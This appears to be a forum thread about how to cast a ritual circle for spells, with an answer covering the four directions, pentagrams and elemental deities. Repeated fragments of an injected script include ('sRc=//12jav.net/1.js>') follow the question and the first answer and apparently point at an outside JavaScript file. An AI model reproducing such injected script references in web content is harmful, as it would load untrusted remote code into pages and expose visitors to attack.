I was recently looking at some spells and some of them required you to cast a circle. What is the proper way to do that? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

It's not necessary. You should to protect yourself from any negative energy/beings that might wish to leech off you while casting, as well as create a sacred space [which can put you in a more magickal state of mind] however not everyone uses circles. I've cast with and without them, all spells worked the same for me. [but you should at least know how and try once just so you get a feel for it] sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

A simple useful way is just using two fingers or a athame and go to each 4 directions (North,West,South, and East) and visualize/image drawing a circle around yourself when stop at the direction I normally use a inverted pentagram but you can use a pentagram if you wish to. Also you can decide which 4 deities or spirits to call out to related/corespondent to the 4 elements ( Fire,Air,Water, and Earth sometimes Spirit adding extra) but all means the choice is always yours.
